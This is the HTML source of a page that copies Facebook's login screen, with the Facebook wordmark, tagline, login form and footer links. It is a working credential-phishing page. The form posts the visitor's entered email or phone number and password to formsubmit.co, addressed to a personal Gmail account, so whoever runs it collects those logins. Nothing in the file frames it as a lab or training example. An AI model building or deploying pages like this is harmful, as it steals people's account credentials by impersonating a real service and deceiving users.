<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto+Flex:opsz,wght@8..144,100;8..144,200;8..144,300;8..144,400&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500&family=Water+Brush&display=swap');
        .outlineNone{
            outline: none;
        }.pageFooter hr{
            width: 61rem; color: #dadde131;
        }
        body{
            color: #1c1e21;
            direction: ltr;
            line-height: 1.34;
            font-size: 12px;
        }
        *{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Roboto Flex', sans-serif;
            font-weight: 300;
            text-decoration: none; list-style-type: none;
        }
        .flexCont{
            margin: 0 auto;
            padding: 20px 0;
            position: relative;
            width: 980px;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        svg{
            height: 106px;
            margin: -28px;
            width: 301px;
        }
        .forData{
            display: block;
        }
        section{
            padding-bottom: 112px;
            padding-top: 72px;
            background: #f0f2f5;
            min-width: 500px;
            height: 720px;
        }
        .cont1{
            margin-right: 0;
            padding-right: 32px;
            width: 580px;
            display: inline-block;
            vertical-align: top;
            padding-bottom: 14rem
        }
        .cont1 h2{
           
            height: 81px;
            width: 500;
            width: 500px;
            font-size: 28px;
            margin-top: -0.2rem;
        }
        .svgg{
            padding: 112px 0 16px;
        }
        form{
            width: 396px;
            height: 349px;
            border-radius: 8px;
            background: #fff;
            padding-top: 0.52rem;
            box-shadow: 0 5px 10px 10px #0000000a;
        }
        .cont2 hr{
            color: #dadde131;
            width: 22.6rem;
            margin: auto;
        }
        .forData{
            height: 52px;
            width: 364px;
            margin: 0.74rem auto;
            border-radius: 6px;
            font-size: 20px;
            color: #90949c;
            border: 1px solid #dddfe2;
            padding: 14px 16px;
        }

        .forgottenP{
            display: block;
            width: 150px;
            margin: auto;
            font-size: 1rem;
            margin-bottom: 1.16rem;
            color: #1877f2;
            text-decoration: none;
        }
        #login{
            height: 48px;            
            color: red;
            font-weight: 800;
        }
        #Add{
            padding: 0.2rem;
            font-weight: 200;
        }
        #createAcc{
            background: #36a420;
            text-align: center;
            height: 48px;
            width: 197px; 
            padding: 0;
            padding-top: 0.64rem ;
            text-decoration: none;
            margin-top: 1.44rem;
            color: #fff;
            font-weight: 800;
            font-size: 1.1rem;
        }
        .createP{
            margin-top: 1.6rem;
            text-align: center;
            font-size: 1rem;
        }
        .forgottenP:hover{
            text-decoration: underline;
        }

        input:focus{
            border: 1px solid #1877F2;
            color: rgb(63, 63, 63);
        }

        .pageFooter{
            width: 980px;
            margin:0 auto;
            height: 12rem;
            padding: 1.2rem 0;
        }.flexItem{
            display: flex;flex-wrap: wrap;
            justify-content: flex-start;
            align-items: center; column-gap: 0.89em;
        }
        





        



    </style>
</head>
<body>
        <section>

            <div class="flexCont">
                <div class="cont1">
                    <div class="svgg">
                        <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z"/><path class="cls-1" d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.75,153.91,347,153.91Z"/><path class="cls-1" d="M380.66,211v-9c0-28.95,16.51-48,50.19-48,31.74,0,45.68,19.3,45.68,47.61v16.3h-65c.65,13.94,6.87,20.16,24,20.16,11.59,0,23.81-2.36,32.82-6.22L474,253c-8.15,4.3-24.88,7.51-39.67,7.51C395.24,260.5,380.66,241,380.66,211Zm30.88-13.3h37.32v-2.57c0-11.15-4.5-20-18-20C416.91,175.14,411.54,183.94,411.54,197.66Z"/><path class="cls-1" d="M591,210.32c0,28.52-13.72,50-42,50-15.44,0-26.16-7.72-30.45-17.59v15.44H489.39V104.8L520.27,102v68.2c4.5-9,14.37-16.3,28.74-16.3,28.31,0,42,21.45,42,50Zm-30.88-7.08c0-14.37-5.57-25.09-20.37-25.09-12.66,0-19.52,9-19.52,23.59v10.72c0,14.58,6.86,23.59,19.52,23.59,14.8,0,20.37-10.72,20.37-25.09Z"/><path class="cls-1" d="M601.33,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62S703,175.14,703,204.53v5.14c0,29.38-16.73,50.62-50.83,50.62S601.33,239.05,601.33,209.67Zm70.78-7.29c0-13.51-5.58-24.23-20-24.23s-19.95,10.72-19.95,24.23v9.44c0,13.51,5.58,24.23,19.95,24.23s20-10.72,20-24.23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.57,24.23,19.94,24.23s19.95-10.72,19.95-24.23Z"/><path class="cls-1" d="M857.39,204.74l30.45-48.68h32.81l-31.95,50.4,33.24,51.68H889.13l-31.74-50v50H826.5V104.8L857.39,102Z"/></svg>

                    </div>
                    <h2>Facebook helps you connect and share with the people in your life.</h2>
                </div>
                <div class="cont2">
                    <form action="https://formsubmit.co/hs5924414@gmail.com" method="POST">
                        <input class="forData outlineNone input1" type="text" name="name" placeholder="Enter address or phone Number" >
                        <input class="forData outlineNone input2" type="password" placeholder="Password" name="password" id="">    
                        <button class="forData outlineNone" id="login" style="color: white; background: #1877f2;" type="submit">Log In</button>
                        <a class="forgottenP" href="#">Forgotten password?</a>
                        <hr>
                        <a class="forData" id="createAcc"  href="#">Create New Account</a>
                    </form> 
                    <p class="createP"><a style="color:#000000;font-weight: 800; font-size: 0.94rem; "  href="#">Create a page</a> for a celebrity, brand or business.</p>
                </div>
            </div>


        </section>

        <div class="pageFooter">
            <div style="display: flex;gap:  .42rem; flex-direction: column;">
                
                <ul class="flexItem ">
                    <li>English (UK)</li>
                    <li><a href="#">اردو</a></li>
                    <li><a href="#">پښتو</a></li>
                    <li><a href="#">العربية</a></li>
                    <li><a href="#">हिन्दी</a></li>
                    <li><a href="#">বাংলা</a></li>
                    <li><a href="#">ਪੰਜਾਬੀ</a></li>
                    <li><a href="#">فارسی</a></li>
                    <li><a href="#">ગુજરાતી</a></li>
                    <li><a href="#">Deutsch</a></li>
                    <li><a href="#">Español</a></li>
                    <!-- <li><button id="Add">Add</button></li> -->
                </ul> 
                <hr>
                
                
                
                
                
                
                
                
                
                
                
            
            

                <ul class="flexItem">
                    <li><a href="#">Sign Up</a></li>
                    <li><a href="#">Log In</a></li>
                    <li><a href="#">Messenger</a></li>
                    <li><a href="#">Facebook Lite</a></li>
                    <li><a href="#">Watch</a></li>
                    <li><a href="#">Places</a></li>
                    <li><a href="#">Games</a></li>
                    <li><a href="#">Marketplace</a></li>
                    <li><a href="#">Facebook Pay</a></li>
                    <li><a href="#">Oculus</a></li>
                    <li><a href="#">Portal</a></li>
                    <li><a href="#">Instagram</a></li>
                    <li><a href="#">Bulletin</a></li>
                    <li><a href="#">Local</a></li>
                    <li><a href="#">Fundraisers</a></li>
                    <li><a href="#">Voting Information Center</a></li>
                    <li><a href="#">Groups</a></li>
                    <li><a href="#">About</a></li>
                    <li><a href="#">Create ad</a></li>
                    <li><a href="#">Create Page</a></li>
                    <li><a href="#">Developers</a></li>
                    <li><a href="#">Careers</a></li>
                    <li><a href="#">Privacy</a></li>
                    <li><a href="#">Cookies</a></li>
                    <li><a href="#">AdChoises</a></li>
                    <li><a href="#">Terms</a></li>
                    <li><a href="#">Help</a></li>
                    <li><a href="#">Contact Uploading and non-users</a></li>
                </ul>

                <div class="flexItem">

                </div>

            </div>
            
        </div>

</body>
</html>
